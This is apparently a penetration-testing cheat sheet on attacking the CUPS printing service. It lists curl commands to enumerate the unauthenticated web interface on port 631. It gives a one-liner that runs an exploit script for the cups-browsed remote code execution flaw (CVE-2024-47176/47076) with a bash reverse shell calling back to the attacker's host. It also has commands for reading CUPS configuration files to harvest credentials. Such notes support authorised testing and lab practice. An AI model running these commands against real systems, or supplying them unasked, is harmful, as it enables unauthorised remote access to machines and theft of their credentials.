CUPS (Printing)

What it is: Common Unix Printing System — manages printers on Linux/macOS. The web interface is often accessible without authentication and has had multiple RCE vulnerabilities.

Default ports: 631

Vuln research:


Access CUPS web interface

Often unauthenticated — Information disclosure

curl http://$IP:631/
curl http://$IP:631/printers
curl http://$IP:631/admin

CUPS RCE (CVE-2024-47176 / CVE-2024-47076)

cups-browsed unauthenticated RCE — Inject malicious printer

# If cups-browsed is listening on UDP 631:
# Send crafted IPP request to add malicious printer
# When a user prints, your command executes
python3 cups_rce.py $IP $LHOST "bash -i >& /dev/tcp/$LHOST/4444 0>&1"

Read CUPS config

Configuration may reveal users and credentials

cat /etc/cups/cupsd.conf
cat /etc/cups/printers.conf
# Look for: AuthType, SystemGroup, device URIs with credentials